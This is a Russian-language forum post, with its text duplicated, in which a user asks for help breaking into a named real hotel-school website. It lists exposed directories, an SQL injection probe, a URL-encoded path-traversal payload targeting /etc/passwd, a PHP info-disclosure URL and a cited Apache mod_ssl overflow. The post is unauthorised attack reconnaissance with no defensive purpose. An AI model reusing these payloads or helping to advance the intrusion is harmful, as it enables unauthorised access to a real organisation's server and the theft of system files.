goot
27.03.2013, 21:48
Привет Всем!
Не могу ни как найти уязвимость http://www.swiss-hotel-school.com/
Что нашел!
1) доступные директории
/cache/
/templates/rt_cerulean/css-compiled/
/images/youtube/
/plugins/content/jw_allvideos/
/plugins/content/jw_allvideos/jw_allvideos/
/plugins/content/jw_allvideos/jw_allvideos/tmpl/
/plugins/content/jw_allvideos/jw_allvideos/tmpl/Classic/
/plugins/content/jw_allvideos/jw_allvideos/includes/
/plugins/content/jw_allvideos/jw_allvideos/includes/js/
2) Попытки sql
http://swiss-hotel-school.com/?format=feed&type=1'
выдает ошибку дальше развить не могу
3) Просканировал
http://swiss-hotel-school.com/index.php?option=com_content&view=article&id=2:школа-bhms&catid=8&Itemid=115&tmpl=component&print=1&layout=default&page=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%0 0
но код не выводит
неизвестная ошибка скрипта
http://swiss-hotel-school.com/index.php?option=com_content&view=1'&id=2:школа-bhms&catid=8&Itemid=115&tmpl=component&print=1&layout=default&page=
Обнаружено переполнение буфера в mod_ssl web сервера Apache.
в rewrite_command для mod_ssl позволяет атакующему, который имеет привилегии на запись в каталог .htaccess
Subject-DN в клиентском сертификате, который передается к функции ssl_util_uuencode_binary() в 'ssl_util.c'.
роботекс
http://swiss-hotel-school.com/robots.txt
пхп сведенья
http://swiss-hotel-school.com/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
Буду рад любой подсказкой
Не могу ни как найти уязвимость http://www.swiss-hotel-school.com/
Что нашел!
1) доступные директории
/cache/
/templates/rt_cerulean/css-compiled/
/images/youtube/
/plugins/content/jw_allvideos/
/plugins/content/jw_allvideos/jw_allvideos/
/plugins/content/jw_allvideos/jw_allvideos/tmpl/
/plugins/content/jw_allvideos/jw_allvideos/tmpl/Classic/
/plugins/content/jw_allvideos/jw_allvideos/includes/
/plugins/content/jw_allvideos/jw_allvideos/includes/js/
2) Попытки sql
http://swiss-hotel-school.com/?format=feed&type=1'
выдает ошибку дальше развить не могу
3) Просканировал
http://swiss-hotel-school.com/index.php?option=com_content&view=article&id=2:школа-bhms&catid=8&Itemid=115&tmpl=component&print=1&layout=default&page=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%0 0
но код не выводит
неизвестная ошибка скрипта
http://swiss-hotel-school.com/index.php?option=com_content&view=1'&id=2:школа-bhms&catid=8&Itemid=115&tmpl=component&print=1&layout=default&page=
Обнаружено переполнение буфера в mod_ssl web сервера Apache.
в rewrite_command для mod_ssl позволяет атакующему, который имеет привилегии на запись в каталог .htaccess
Subject-DN в клиентском сертификате, который передается к функции ssl_util_uuencode_binary() в 'ssl_util.c'.
роботекс
http://swiss-hotel-school.com/robots.txt
пхп сведенья
http://swiss-hotel-school.com/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
Буду рад любой подсказкой